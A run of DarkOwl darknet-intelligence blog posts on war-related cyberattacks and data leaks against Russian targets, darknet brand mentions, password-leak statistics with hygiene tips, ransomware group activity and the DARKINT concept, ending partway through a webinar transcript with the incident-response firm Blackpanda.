Oil and gas related entities in Russia such as: Gazprom Linde, MashOil, Neocom Geoservice, Enerpred, Aerogas, and Technotec have all suffered cyberattacks resulting in thousands of internal Microsoft Exchange email data leaks in the deep web. In late April multiple explosions occurred resulting in catastrophic fires and injuries at Druzhba oil depot. Subsequent open-source reports on Telegram suggest that the explosions at the Transneft-Druzhba Oil Depot supplier for military units were ‘delivered with the help of drones’ from Ukraine. The depot and associated pipeline is the main route for getting Russian oil into its European customers, although EU leaders have signaled a plan to stop purchasing oil from Russia by the end of the year which may lead to a full embargo across the continent.
In recent weeks, several other mysterious fires across the country have been reported including an ammunition depot in Staraya, another ammunition plant in the Russian town of Perm, an Aviation school in the same village of Perm, a government building in Korolev, a chemical plant near the border of Ukraine, an oil depot in Belgorod, a defense research center in Tver, a pro-Kremlin publishing house in Moscow, a storage hangar in the Bogorodskoe district, and oil tanks were set fire in the industrial zone of Nizhny Novgorod.
Another random fire also started in Belgorod less than two days ago. Reports have not specified where the fire originated specifically.
Figure 4: Recent Explosions in Belgorod Captured by Social Media Users (Source: VK)
It is unclear from reporting whether these explosions were a result of SCADA cyberattacks or direct arson and sabotage by Russian locals sympathetic with the situation in Ukraine. The darknet threat group GhostSec recently compromised Russia’s Metrospetstekhnika ASOTP system for transportation and successfully caused dozens of trains connected to the system to cease operation. The group claims they were able to access and disrupt the internal temperature, smoke, and backup battery systems for any of the trains connected to the network.
Figure 5: Announcement of Metro Train Attack by GhostSec (Source: Telegram)
Anonymous Leaks Stolen Data
Within days of the invasion, targeting and exfiltrated data from targets across Russia surfaced in the deep web. DarkOwl has been monitoring mentions and announcements of data leaked in relation to the since the start of the cyberwar and found hundreds of leaks related to numerous government and commercial industrial sectors across Russia, Belarus, and China. The chart below demonstrates the volume of unique URLs observed containing information related to the war. In the early days, much of the leaked information contained network reconnaissance information (IP addresses, domains, credentials) for carrying out attacks against critical targets, and PII for government, military, and citizens of Russia.
Figure 6: Distribution of Daily Data Leaks Related to Global Cyberwar
As the war progressed, stolen data of all kinds, e.g. intellectual property, design schematics, military plans, financial account data, and emails appeared. While in recent weeks the number of unique leaks are fewer, the contents contained therein are higher volume and significant in value. For example, over the last two weeks, Anonymous has released – via DDoSecrets – over 3TB of data archives containing thousands of emails and sensitive internal documents from victim organizations across Russia.
Figure 7: Distribution of Data Leaks from the Cyberwar by Industry Sector
Nearly 90% of the leaks DarkOwl has observed are related to targets in Russia. The figure below is a distribution of the non-Russian countries information that has surfaced, with direct mention of the cyberwar. The threat actor group, AgainstTheWest (ATW) concentrated on technology, government, and financial targets across China in the weeks following the invasion. ATW has since stopped participating in the campaign.
Figure 8: Percentage of non-Russian Data Leaked with Direct Mention of Global Cyberwar
Russia’s Response Takes Many Forms
Readers should not be fooled into thinking that this data means that Russia is sitting back idly during these attacks. In addition to the crippling Viasat attack the day of the invasion and widespread propaganda dissemination, GRU-affiliated cyber actors have regularly attacked Ukrainian telecommunications and critical infrastructure alongside its ground-based offensives. Elon Musk also recently stated that Starlink satellites in use by the Ukrainian government for Internet broadband access is under frequent targeted signal jamming by Russian-linked hackers.
State-sponsored malicious cyber actors, ransomware and affiliated extortion groups linked to Moscow continue to spray US and western European companies with widespread spear-phishing attacks and malware deployment. During our recent review, we estimate ransomware gangs successfully encrypt on average a dozen organizations per day.
DarkOwl will continue to monitor the darknet and deep web for critical information pertaining to the quickly evolving cyber landscape.
Curious about something you read? Interested in learning more? Contact us to find out how darknet data applies to your use case.
This blog discusses how DarkOwl’s software-as-a-service (SaaS) product suite – Vision App, Search API, and Entity API, can be utilized to protect corporate brand reputation and value.
Darknet Background
The darknet – also referred to as the dark web – is a segment of the Internet, hidden by the novice user, that is only accessible by using specialized software or network proxies. Due to the inherently anonymous and privacy-centric nature of the darknet, it facilitates a complex ecosystem of cybercrime and illicit goods and services trade. The most common darknet to date is “The Onion Router” or simply, Tor.
The deep web is a collection of websites that do not require anonymization software to access but require unique knowledge of the URL or account curation and authentication for entrance. While a personal banking account portal is technically in the deep web, much of the deep web facilitates cybercrime through criminal marketplaces and discussion forums.
DarkOwl defines darknet-adjacent networks, such as servers and channels from Telegram, IRC, and Discord as instant-messaging chat platforms featuring real-time communications (or “chatter”) of on-going criminal activity and active cyber operations.
Decentralized Darknet Marketplaces
The darknet is home to decentralized darknet marketplaces (DNM), e-commerce platforms where buyers and sellers transact directly with each other through peer-to-peer networks or the Tor network. Marketplaces usually employ cryptocurrency-based escrow built into the marketplace to facilitate secure and anonymous deals between the buyers and vendors.
One of the first and most well-known darknet marketplaces is the Silk Road, established in 2012 by its founder, “Dread Pirate Roberts” – Ross Ulbricht. Upon its shutdown and for years after, the US government seized an estimated of $1 billion USD in Bitcoin connected to Silk Road.
The seizure of Silk Road and the lifetime sentence of Ulbricht has not deterred criminals from continued illicit goods trade in the darknet. As of time of writing, DarkOwl has knowledge of 30 large-scale decentralized markets currently online and hundreds of smaller single-vendor operated or single-product marketplaces in operation across the darknet and deep web.
Forms of Brand Mentions in the Darknet
Corporations and organization, along with their key leadership, are regularly targeted and ‘mentioned’ in the darknet – across marketplaces, discussion forums, and transient paste sites. Many times, the references are specific to a cyber campaign to target the company while others are perfectly-matched counterfeited goods marketed by underground counterfeiters and resold on darknet decentralized marketplaces.
The most common types of critical brand mentions in the darknet include:
Derogatory Mention by a Disgruntled Customer or Employee
Personal Dox of Corporate Leadership and/or Board Members
Targeting Data in association with Malicious Cyber Operations
Leaked Critical Company Data
Cracked Software Distribution
Pirated Media and Streams
Counterfeit Product Sales
Examples of Corporate Brand Mentions in Vision
Using the common forms listed above, this section provides real-examples of brand mentions in the darknet, deep web, and darknet-adjacent platforms and captured by DarkOwl’s autonomous content crawlers.
A disgruntled employee of Wells Fargo states that the company is ‘scandalous’ and ‘corrupt.’ They also highlight a major cyber risk for the company, where they have been instructed to use other employee’s logins to do their job.
A dox (also doxx) is a detailed public record of someone’s identity. To ‘dox’ someone is to publish private information about that person – as a form of public shame and generated to enact revenge on the company or person for some perceived wrongdoing. The dox presents a significant security threat to the company and the individual, with detailed information such as their mobile phone numbers, residential address, social media accounts, bank accounts, and familial associations publicized and subsequently targeted for phishing, fraud, and even kidnapping for murder or extortion.
Every ‘dox’ has a reason for publishing the information to a public record.
Corporate leadership, members of the board of directors, and key figures related to many brands and international entities are regularly targeted for ‘doxing’ in the darknet.
Threat actors identify Gazprom’s subdirectories, subdomains, and IP addresses in preparation for a concerted attack against the oil and gas supplier in retaliation for Russia’s invasion in Ukraine.
Less than a month later, a significant volume of data from Gazprom and its subsidiary, Gazprom Linde Engineering was leaked on the darknet including 768,000 emails from the joint Gazprom-Linde Microsoft Exchange server.
Hacktivists regularly target companies and brands in support of geopolitical and social injustice initiatives.
The image below includes an announcement on Telegram by pro-Ukrainian hackers calling for the boycott of purchasing Nestle products due to their continued operation in Russia and subsequent economic support for the Putin-backed Kremlin.
In the days following the post on Telegram, prominent darknet threat actor group, KelvinSec compromised Nestle’s company network and leaked sensitive databases containing their customers, transaction, and shipping data.
Figure 6: Screenshot from the actual database leaked from Nestle, consisting of customer entity data, orders, payment information, and passwords (10GB total)
Cybercriminals often leak large sets of company-proprietary and sensitive data obtained via ransomware attack or malware infection of a company’s network. Critical corporate data might include – but is not limited to – software source code, sensitive email communications, employee W2 verification data, identity documents such as driver’s licenses and passport images, and financial statements.
“Cracking” is a broad term used by darknet and deep web threat actors to describe the process of breaking into something, more often bypassing software licenses and passwords required by computer software programs.
Adobe Products are regularly targeted for ‘cracking’ due to steep costs for their software product licenses and subscriptions. Threat actors on Telegram detail how to install ‘cracked’ version of Photoshop and DLL manipulation to override licensing requirements.
Pirated media, movies, and streams have continued presence on the darknet. The Pirate Bay – considered the “most resilient BitTorrent site” on the Internet still circulates the latest movie titles.
Figure 10: The Pirate Bay BitTorrent Download Landing Page
The illicit trade of counterfeit goods is a multi-billion-dollar international industry – which continues to be led by China. According to Europol, surface web monitoring helps crack down on the major counterfeit goods suppliers, but many sophisticated networks simply shift to the darknet and use decentralized darknet markets to sell their counterfeited items.
Many darknet marketplaces feature a section of “counterfeit goods” that encompasses physical counterfeited items, a buyer can purchase and have sent to them directly. Watches and fine jewelry are the most common physical goods offered on underground marketplaces.
Figure 11: Active Listing for a Counterfeit Ladies’ Panthere de Cartier Watch on Vice City
Marketplaces are more commonly known for their diverse and extensive selection of drugs available for purchase. DarkOwl has witnessed the defamation of many brands in affiliation with common street drugs.
For example, the Warner Bros (WB) entertainment brand has been extensively used by drug dealers on the darknet in the advertisement of “WB-shaped” ecstasy (XTC) pills and their comic-book heroes and cartoon franchises exploited in the distribution of marketed Batman, Superman, and Looney Toons-specific drugs.
Figure 12: Screenshot of Offer Captured in DarkOwl Vision DocID: 1411b1671a1aeedae7c1add5b996d769
DarkOwl Solutions for Brand and Reputation Management
DarkOwl’s SaaS product suite of its Vision App, Search API, and Entity API are designed to help augment surface web monitoring for brand mentions like those discussed and outlined in this document.
In the Vision App, analysts can create automated monitors and alerts to notify when critical corporate information or counterfeited products are circulated in darknet paste, discussions forums, or marketplaces.
Figure 14: Screenshot from DarkOwl Vision’s Search, Monitoring, and Alert Features
Curious about something you read? Interested in learning more? Contact us to find out how darknet data applies to your use case.
In honor of World Password Day – a date established in 2013 by Intel Corporation to foster security awareness – the content team at DarkOwl decided to compile some interesting statistics based on the email and password entities available in the DarkOwl Entity API.
DarkOwl’s Entity Volume
Every day we hear of another commercial data or app breach. At this point, everyone can assume their email address and/or password has been leaked on the darknet or deep web. DarkOwl has collected and tokenized over 8.68 billion (with a “B”) email addresses. 5.46 billion of those emails include a password. 57% of those email addresses include a ‘plaintext’ or legible password.
But My Password is Complex!
If you’re still using your cat’s name followed by the exclamation point (“Fritzie!”), your password is not complex, and you have most likely already experienced an account compromise. But, you’re not alone. Complex, lengthy passwords are not the norm across DarkOwl’s data.
The most common password length is 8 characters.
Figure 1: Distribution of Password Volume by Password Character Length
Is an 8-character length password strong enough?
The strength of an 8-character password depends on the motivation and the tools available to the cybercriminal targeting your account. There are plenty of password ‘cracking’ tools readily available to hackers to conducting dictionary and brute force style password attacks. Some of the most popular tools include:
John the Ripper
Cain & Abel
OphCrack
THC Hydra
Hashcat
Brutus
RainbowCrack
CrackStation
Even the most sophisticated password crackers will need significant processing power and time to successfully break long, complex passwords. Unless an 8-character password includes numbers and symbols, the password can be potentially brute forced.
Figure 2: Time to Crack Passwords of Varying Degrees of Character Length and Complexity
Over 4 billion of the passwords (4,285,451,030) available in DarkOwl’s Entity API are 32 characters or less. 662,341,057 passwords could be classified as extreme and greater than 32 characters in length.
Figure 2 demonstrates that passwords including numbers and symbols are harder to crack than letters alone. DarkOwl’s data contains a significant volume of passwords with some degree of complexity but only 637 million plaintext passwords would be classified as “strong.”
Strong passwords defined as containing special characters, digits, lowercase, uppercase, and length greater than 8 characters.
Passwords That Age Us
Do you have a favorite year that you include in your password for uniqueness? Perhaps it’s your birthday year or anniversary. Both are very common. We found over 707 million passwords include a year string that starts with “19XX” or “20YY.”
According to our data distribution, peak volumes of passwords include the data range of 1980 to 1994. The most frequent years we observed were:
1990: 14,006,141
1987: 13,795,566
Figure 3: Distribution of Passwords Containing a Date (Year) String
QWERTY is Simply Lazy
The “QWERTY” keyboard layout originated in the late 1860s and was designed to help people type and translate Morse code faster. Regardless of its origins, people heavily rely on the top row of the American keyboard characters in many password fields; 5,793,906 passwords in DarkOwl Entities API contains the6-character string “qwerty.”
Even worse is sequential numbers with 29,010,394 consisting of “123456” and 11,718,471 going to the trouble to add the whole number set, “123456789.”
DarkOwl has collected 5,857,363 passwords using the laziest password of all: the word, “password.”
Hashed Passwords > Plaintext
Billions of leaked plaintext passwords are tragic, no matter the complexity, character length, or whether a date string or qwerty is included. Therefore, if you suspect a plaintext password you use or have used in a commercial webservice has been compromised, change it immediately and cease using it on any authentication logins. Credential stuffing campaigns exploit password reuse and utilize email address and password combinations to attempt logins outside of the source of the original leak.
6% (518,566,724) of the passwords available in DarkOwl’s Entity API are hashed passwords.
In cryptography, hashing involves using a mathematical algorithm to map data of any size into a bit string of a fixed size. In password hashing, a ‘hash’ consists of a unique digital fingerprint (of a fixed size) corresponding to the original plaintext password which cannot be reversed. There are several different types of ‘hashing algorithms’ available for encrypting passwords.
The most common hash in DarkOwl’s data is MD5 followed by SHA-1.
Some MD5 hashes in phpBB and WordPress appear as 34 characters instead of 32. DarkOwl has 345,431 hashed passwords consisting of 34 characters.
Both MD5 and SHA-1 have been deemed vulnerable as they are subject to collision attacks and dehashing. One of the most popular password hacking programs to date, Hashcat, contains lookup tables for popular wordlists, like RockYou allowing for the original plaintext password to be deciphered.
Password Strengthening Tips
Although you can’t prevent commercial services getting breached and usernames, email addresses, and password combinations getting leaked, you can follow some simple steps to ensure you employ robust password hygiene and reduce the risk of a password getting brute forced or exploited in a credential stuffing campaign.
Use an automated complex password Manager like Lastpass, BitWarden, or 1Password.
Don’t reuse passwords. Have unique password for every login and streaming service you sign up for.
Choose passwords at least 16 characters in length.
Include symbols and numbers for increased complexity.
Avoid using passwords with dictionary words or names.
Don’t use sequential numbers or the word “password”
Don’t use the year of your birth or anniversary in your password.
Turn on multi-factor authentication (MFA) for important accounts like financial and banking sites.
Celebrating World Password Day
Today’s World Password Day is a perfect time to pause and review the security – or lack thereof – of your most common password habits. After reading this blog, we invite to you to consider taking the following actions today:
Review passwords stored in your keychain, password managers, or sticky notes.
Change any passwords you might be reusing across multiple sites.
Share password tips on social media with friends and family.
(#WorldPasswordDay)
Transform a weak password into a strong one using the password strengthening tips above.
Turn on MFA for all important accounts.
Curious about something you read? Interested in learning more? Contact us to find out how darknet data applies to your use case.
In the days immediately following the invasion of Ukraine, the ransomware-as-a-service (RaaS) industry on the darknet experienced several high-profile interruptions with many popular RaaS affiliate programs impacted by their partners having to choose between their nationalistic alliances with Russia or Ukraine. Many wondered what impact this would have on the thriving ransomware ecosystem.
A security researcher leaked critical operational data, personally identifying information for threat actors, and sensitive private chats between members of the CONTI RaaS group. The data leak revealed the human side of some of the most prominent RaaS organizations with mentions of personal “visits to the dentist” and recommended songs to listen to on YouTube to pass the time while working on their exploit and attack campaigns.
From an operations perspective, we also learned the critical roles Bazarloader Botnet, Cobalt Strike, and Trickbot played in the long-term success of CONTI’s empire.
Shortly after the leaks emerged, CONTI’s leak site slowed in announcing victims from 10 through 16 March. However, during that same time STORMOUS announced they had compromised Ukraine’s Ministry of Foreign Affairs. Around the same time, Ukraine’s Vodafone network suffered a major cyberattack and was knocked offline.
The interruption in victim announcements was more like a slow-down and did not last long with a quick ramp up from the major RaaS industry players: CONTI, Lockbit 2, and CL0P announcing dozens of victims during the month of April.
LockBit2 – a gang that “claimed” neutrality in the Russian-Ukraine war – has the highest number of total victims since the 24th of February at 280. That’s an average of 4.5 victims per day by a single group.
DarkOwl is currently tracking 25 active ransomware groups. Across those groups, the total number of victims – just since 24 February – totals 813, presenting an even more worrisome average of 11.8 victims per day.
Figure 2: Scatter plot distribution of daily ransomware victims per RaaS gang
Critical Infrastructure Targeted
Unsurprisingly, victims include several US and NATO-based critical infrastructure organizations and suppliers including local government municipalities, electrical and alternative power providers, water, telecommunications, and transportation suppliers.
DarkOwl also observed an increase in manufacturing and construction-related companies with downstream victims including international lumber and steel processing companies mentioned quite frequently.
CONTI announced last week they successfully encrypted US-based MACK Defense, LLC a major parts supplier and sales organization attached to the MACK trucking company. This will likely cause further interruptions to an already encumbered and fatigued US ground-based supply chain.
Meanwhile, Snatch leaked over a gigabyte of data from a popular European travel website, TUI Group.
Figure 3: CONTI Announcement of Ransoming MACK Defense, LLC
Ransomware groups have announced at least half a dozen victims across electrical, water, or natural gas-affiliated suppliers the US, Canada, and Europe in the last 10 days.
In March, German wind-turbine supplier Nordex suffered a severe cyber incident carried out by CONTI shutting down over 5,000 wind turbines across the country. On April 23rd, CONTI leaked 145GB of exfiltrated data related to the company, archived across 82 compressed data files. The Nordex cybersecurity incident was likely a critical infrastructure retaliation attack for Germany’s support of Ukraine.
HiveLeak and AlphaV’s activity also increased significantly with nearly 100 victims between the two RaaS gangs alone. Vice Society also leaked 20 victims in the last 10 days of April after previously having a relatively slow ransomware
Figure 4: Statement from Snatch Ransomware
The Resurrection of REvil
REvil’s “Happy Blog” suddenly appeared online and operational on April 20th on the Tor network, redirecting to a new URL which announced 5 victims. The last victim posted by the REvil group was in mid-October 2021 shortly before experiencing 404 errors and rumors emerged suggesting the FBI had seized the admin panel had deleted the Tor service using UNKN or another admin’s keys.
According to the BBC, members of the REvil RaaS operation were reportedly taken into custody by the Russian FSB after an international law enforcement operation last December.
The redirected URL includes a link to “Join Us” with a request for affiliates to contact them using a Tox address provided. The advertisement continues their historical 80/20 ransom split and states they have a “Тот же проверенный (но улучшенный) софт” [TRANSLATED] “The same proven (but improved) software.”
Figure 5: REvil’s Latest Call for Affiliate Partners
The new REvil Tor service boasts an odd-mix of victims, including an oil and gas company in India, asphalt production company and a corporate signage company. By the end of the month, the service was offline and inaccessible. The intentions of revitalizing the REvil Tor service is unclear, but the timing was near coincident with the US closing diplomatic channels with Russia on cybersecurity.
The resurrection of REvil could indicate that President Putin has released arrested ransomware operators to carry out retaliatory attacks against critical targets in the US and Europe.
New Ransomware Groups and Patterns Emerge
A new RaaS group called Blackbasta appeared online and announced 11 new victims on the 26th of April. Blackbasta uses the ChaCha20 and RSA-4096 cipher, an upgrade from groups like Maze and Sekhmet that utilized ChaCha20 and RSA-2048 ciphers. They also call their Tor victim’s page, “Basta News” playing off the CONTI marketing strategy.
Figure 6: Blackbasta Tor Service “Basta News” 30 April, 2022
Another new group, Onyx ransomware started leaking their victim data on a Tor service titled, “Onyx News” with 7 new victims added at the end of April. The victims appear to be primarily small businesses and organizations, including a local US police office and a couple of family medical practices.
The x001xs ransomware group appears to have pivoted to a different underground industry with no victims announced since late January. Their Tor service also now redirects to a darknet credit card provider called “BitCarder.”
RaaS group activity across the whole industry has steadily increased over the last 10 days. When visualizing the various groups’ victim announcements as a function of post-date, they demonstrate quite noticeable “peaks and valleys” that suggest less publishing collectively occurs on weekends.
The outlier for this trend is CL0P who drops several groupings of victim announcements only around the weekends. The CL0P group was much less active in March with announcements only at the beginning and end of the month.
Figure 7: Daily Distribution of Total Victims Per Day Across All Groups, with 3pt Moving Average Filter
Ransoming Russia
Since the end of March, an Anonymous-linked, pro-Ukrainian cyber threat cell known as Network Battalion ’65 (or simply nb65) has carried out cyberattacks against Russian entities using ransomware. The group allege they are deploying a variation of the leaked CONTI ransomware source code, which surfaced shortly after the invasion. We have identified and downloaded at least half a dozen data leaks provided by the nb65 group that accompanied the group’s announcement of the CONTI code use.
Figure 8: nb65 Announces Use of CONTI ransomware Against JSC Bank of Russia
Hackers Hacking Hackers
On 20 March, Arvin Club published a data leak associated with the pro-Russian aligned STORMOUS ransomware gang. Arvin claimed the group poorly configured their ‘new’ Tor service after mirroring their Telegram content to the anonymous network. It was unclear whether this was motivated by malice or geopolitical alliances.
In early March, STORMOUS posted an official statement to their Telegram channel stating they did not intend to attack Ukraine but could not sit back and watch attacks against the country [Russia] that “means so much to us.” They also included CONTI’s logo and the handshake emoji with their respective hashtags, symbolizing some level of partnership.
Figure 9: Arvin Club Leak of STORMOUS Info on Tor | STORMOUS World Announcement
In the last month, Russian ransomware groups and threat actors are actively targeting pro-Ukrainian cybersecurity researchers and Anonymous-linked cyber cells. Many researchers have been doxed and threatened across social media and Telegram in vendetta-like attacks.
Figure 10: Twitter Post Warning Anons that Russian Ransomware Gangs are Targeting the Anonymous Collective
Curious about something you read? Interested in learning more? Contact us to find out how darknet data applies to your use case.
The darknet (or “dark web”) is a thriving ecosystem within the global internet infrastructure that many organizations struggle to incorporate into security posture, but is becoming an increasingly vital component. In certain cases, that is because taking raw data and turning it into actionable security intelligence requires leveraging DARKINT – or data points sourced from the darknet and other OSINT sources that together form a risk and/or investigative portfolio.
Darknet 101
The darknet is a layer of the internet that was designed specifically for anonymity. It is more difficult to access than the surface web, and is accessible with only via special tools and software – specifically browsers and other protocols. You cannot access the darknet by simply typing a dark web address into your web browser. There are also darknet-adjacent networks, such as instant messaging platforms like Telegram, the deep web, some high-risk surface websites.
Quick Definitions:
darknet: Also referred to as the “dark web.” A layer of the internet that cannot be accessed by traditional browsers, but requires anonymous proxy networks or infrastructure for access. Tor is the most common.
deep web: Online content that is not indexed by search engines, such as authentication required protected and paste sites and can be best described as any content with a surface web site that requires authentication.
high-risk surface web: consists of areas of the surface web (or “regular” internet) that have a high degree of overlap with the darknet community. This includes some chan-type imageboards, paste sites, and other select forums.
For a full list of darknet terms, check out our Glossary.
What is Darknet Intelligence (DARKINT)?
DARKINT™ is a term, trademarked by DarkOwl, that combines two concepts: darknet and intelligence.
The darknet, also referred to as the dark web, is a segment of the Internet, hidden by the novice user, that is only accessible by using specialized software or network proxies. Due to the inherently anonymous and privacy-centric nature of the darknet, it facilitates a complex ecosystem of cybercrime and illicit goods and services trade.
Data scientists define intelligence as a continuum of increasing data complexity. At the foundation of the pyramid is “raw data.” In statistics, raw data refers to data that has been collected directly from a primary source and has not been processed in any way. (Source)
Assembled collections of raw, unverified data across multiple sources with context forms the basis of “information.”
Intelligence is the consequence of combining analyzed, interpreted, and validated information with informed perceptions and personal experience to drive decisions.
Some key features of intelligence:
Intelligence is created and shaped by humans. Machines can compile information but cannot produce intelligence.
Intelligence is based on multiple, trusted and verified sources.
Data intelligence is also sometimes referred to as ‘insights.’
Intelligence utilized by national security or geopolitical decision makers is often accompanied by a numerical confidence value, calculated using the history, veracity, and perceptions of the information available.
DARKINT™ is intelligence derived from pure darknet, deep web, and associated adjacent underground cyber information sources.
Darknet Intelligence and DARKINT™
DarkOwl’s product suite facilitates the formation of actionable, DARKINT because its Vision platform collates darknet data from multiple sources including the deep web, high-risk surface web, and darknet-adjacent networks, such as instant messaging platforms like Telegram and IRC.
In the framework of underground criminal activity and darknet(s), the continuum of data, information, and intelligence follows the example:
a sample of raw data could be a leaked credential for ABC software company;
information consists of a document in DarkOwl Vision collected from a darknet forum where a threat actor shares a database containing the leaked credentials from ABC software company in conjunction with a known vulnerability against Microsoft Exchange server;
a security analyst receives an alert of this document and analyzes this information to find the threat actor’s social media account touting they will carry out a ‘special’ cyber-attack next weekend, coupled with a scan of the software company’s network indicating they haven’t installed multi-factor authentication on their employee accounts. Using this analysis and their intuition, the analyst produces a security risk intelligence assessment stating they believe with high confidence the threat actor is very likely to attack ABC software company as early as next weekend and alerts ABC’s IT department to deploy multi-factor authentication and immediately patch all potential points of network entry.
The information in DarkOwl Vision, combined with open-source intelligence (OSINT) resources such as social media, port scanning, and network data, facilitate comprehensive business decisions across a numerous diverse set of use cases: threat intelligence, fraud detection and mitigation, cyber insurance, supply chain and vendor risks, digital identity protection, national security, critical infrastructure protection, and law enforcement investigations.
Common Types of Raw Data & Information Circulated on the Darknet
Personally Identifiable Information (PII)
Personally Identifiable Information, or PII, is any information used to identify an individual. This type of data is incredibly valuable on the darknet, especially when combined with credential information. Examples include full name, billing address with the zip code, date of birth, email address, passport numbers, national identification numbers, and phone numbers. It also includes anything associated with one’s online presence such as a social media profile. Even information like a leaked mobile phone number can be leveraged by threat actors for social engineering activities like SIM swapping, which is used by criminals to bypass multi-factor authentication and gain unauthorized access to online accounts.
Banking and Transaction Data
Debit and credit card numbers are a common type of raw data available on the darknet. Some criminals specialize in the trade of the cardholder’s sensitive PII associated with associated details for debit and credit card numbers, e.g. CVV, expiration date, and personal pin code. Criminals use card numbers to make fraudulent purchases online and deliver them to a different address, make a series of low-cost purchases the victim won’t notice, or buy expensive goods in person.
There are numerous forums and marketplaces specializing in banking, carding, and financial fraud on the darknet and in DarkOwl Vision.
Critical Corporate Data
Critical corporate data consists of mentions of company names, domain names, IP addresses and other corporate identifying markers on the darknet. Sometimes raw corporate data like the domain name, subdomains, or IP addresses for a company are shared in the darknet or deep web temporary paste sites for threat actors to collaborate ahead of a concerted cyberattack against the company.
A darknet database brokerage service advertising a company’s stolen competitive intellectual property, product design schematics, and sensitive financial or contracts packages for sale is information, not intelligence.
Credentials and Compromised Accounts
Credentials are the secure information required to safely log in to network accounts. It is user-specific information that verifies the identity of the user attempting to access to the website or service. Some credentials are also considered PII. Credentials which include personal names such as usernames, are also considered PII. Email addresses and passwords are the most common type of credentials. More sophisticated credentials include PGP keys, AWS/Azure developer secret keys and security tokens. Credentials can also include user-verification and digital identity authentication tools.
Malware, Exploit Toolkits, and Ransomware
Malware is malicious software with harmful code designed to break into, infect, steal, surveil, compromise, or crash networked devices. It is used to get what a criminal wants from a target without their consent. There are many categories of malware like viruses, spyware, keyloggers, and ransomware.
Several types of malware, exploit toolkits, and ransomware are available for purchase on the darknet. High quality malware has detection-evasion, to bypass network security systems, and will establish persistence, meaning it will stay undetected and continue giving the cybercriminal access to the information on the compromised device for months or years.
Information consists of feeds and documents in DarkOwl Vision detailing the advertisements for such malware on offer or a ransomware Tor service publishing the identities of their victims along with the extorted sensitive corporate data and PII stolen from the victim.
Malware development and exploitation attack techniques are also openly discussed in darknet forums collected by DarkOwl Vision.
Example Darknet Sources Containing High-Consequence Information
Threat Actor Chatter from Instant Messaging Platforms
Conversations (also known as “chatter”) directly from and associated with threat actors and their associated criminal communities on instant messaging platforms are an important aspect of information gathering to develop intelligence assessments based on DARKINT.
Instant Relay Chat (IRC) has been a historical, real-time chat environment for threat actors to plan, collaborate, and securely distribute stolen information related to cybercrime. Modern chat platforms like Telegram are an increasingly popular, high-frequency source of substantial darknet-adjacent information, despite not being directly connected to the darknet. These types instant messaging platforms are widely utilized by threat actors, who administrate both public and private servers and channels.
Chatter from instant messaging platforms coupled with darknet forum posts and OSINT aides in the translation of information into actionable, high-confidence DARKINT judgements.
Nation State Actors and Political Activity
Darknet intelligence concerning nation state actors and political activity is becoming increasingly relevant. Nation-states are typically on the darknet for intelligence gathering and espionage, campaigns to disrupt critical infrastructure of other nation-states, activism and propaganda, sharing and testing source code, exploits, and vulnerabilities, and for financial gain. Disinformation and misinformation are powerful tools some nation-states use to sway public perception and opinion.
In just the last 90 days, Telegram has featured as a critical network for 24/7 disinformation campaigns and information operations spearheaded and sponsored by the governments of Russia and Ukraine. Channels regularly include interviews with prisoners of war (POWs), digitally altered videos to trigger false-flag operations or claim kinetic military success against critical infrastructure, and leaked data disseminated from successful cyber operations.
Conclusions
DARKINT is the byproduct of combining human-powered analysis of validated data derived from darknet sources with informed perceptions and personal experiences.
By actively monitoring for raw data points such as sensitive PII, compiled information advertised and discussed on forums and marketplace, along with darknet-adjacent chatter and associated OSINT signals, one can create concrete DARKINT, and quickly deploy remediation or defense mechanisms accordingly.
DARKINT is most effective when applied to drive complex decisions like quantifying supply chain and vendor risk, underwriting cyber insurance policies, fraud mitigation and digital identity protection efforts, or creating qualified, actionable threat intelligence products in matters of national security, critical infrastructure protection or law enforcement investigations.
DarkOwl’s Vision-derived DARKINT helps international governments, local law enforcement, individuals, and companies create a more comprehensive security posture.
Learn how DarkOwl’s darknet intelligence platform plays a critical role in how Blackpanda supports customers bounce back from an attack, providing robust darknet data to fully understand customers’ risk profile and asses threats. Plus, dive into a case study and see the platform in action.
For those that would rather read the conversation between CEO of DarkOwl, Mark Turnage, and Director of Strategic Development at Blackpanda, Mika D., we have transcribed the presentation below.
NOTE: Some content has been edited for clarity.
Mika (Blackpanda): Thank you, everyone, for coming to this Blackpanda, DarkOwl information session. Very excited to be partnered with DarkOwl, Blackpanda being an incident response firm. We’re going to get into more of that. Today we really wanted to present the value to end users, customers, large companies, and organizations of this partnership that we’ve developed. So with that, we’ll jump into some introductions. Mark is the CEO and founder of DarkOwl with a very, very long list of credentials and much experience, I will hand it over to him to do a bit of introduction.
Mark (DarkOwl): Great, thank you for having us, Mika, and delighted to be here. My background is as an entrepreneur in the security space. All the companies that I’ve run have been security related companies, most recently DarkOwl, which we founded five years ago. My co-founder and I and are very pleased to be here and looking forward to this conversation.
Mika: Great, thank you, Mark. I’m representing Blackpanda, Director of Strategic Development. I was also the founding incident response member of the Blackpanda Group that’s based out of Singapore and Hong Kong. We address special risks from incident response malware, business email compromise, different kinds of cyber attacks all the way down the cycle to cyber insurance. So, risk transfer and mitigation ahead of time to try to prepare the environment in the event that something happens. My background is primarily in national security and a full range of cybersecurity services, products, and a little bit of time in the intelligence community. So excited to jump into this webinar and give you a better idea of how our incident response services and deep web threat intel work together a bit on the cyber incident response side of the house. We hyper focus on digital forensics, the investigation, and cyber crimes, and we are stationed in different cities across Southeast Asia so that we have a local presence in all of these markets if and when an incident occurs.
A bit about the incident response lifecycle because it’s confusing what happens exactly when an organization is hacked and how does that move forward? How do we work with our partners, especially when something happens?
Essentially, incident response starts with a call, an alert or an automated indicator that comes from one of our intelligence platforms, be it DarkOwl or an endpoint detection and response tool or our own proprietary software. Once we receive that alert or notification, we will then determine the validity and extent of the attack. So it’s kind of like scoping out what happened and what resources do we need to deploy in order to address it? We prepare the team and we proceed to a triage process where we’re gathering evidence. We’re looking for indicators of compromise, we’re collecting a plan of action, and we work with the client in order to basically stop the infection from spreading any further. Then we move into the containment phase. Within the first 48 hours, we’ve figured out roughly what’s going on, who is the threat actor, and question what assets could be at risk and what data is at risk.
The customer always wants to know, has data been leaked? What kinds of emails or passwords or proprietary files might be out and be in the dark web? And at that point, we will then turn to some of our partners, such as DarkOwl, in order to enhance that information. So, as we’re containing the malware, we’re also providing the suite of the environment to look for extended attacks. This could be second stage payloads, which would be if the attacker first gets in and spreads more malware, or they’re looking to steal credentials or steal certain files. So, we’re really examining both inside the organization as well as from outside what might have left the organization.
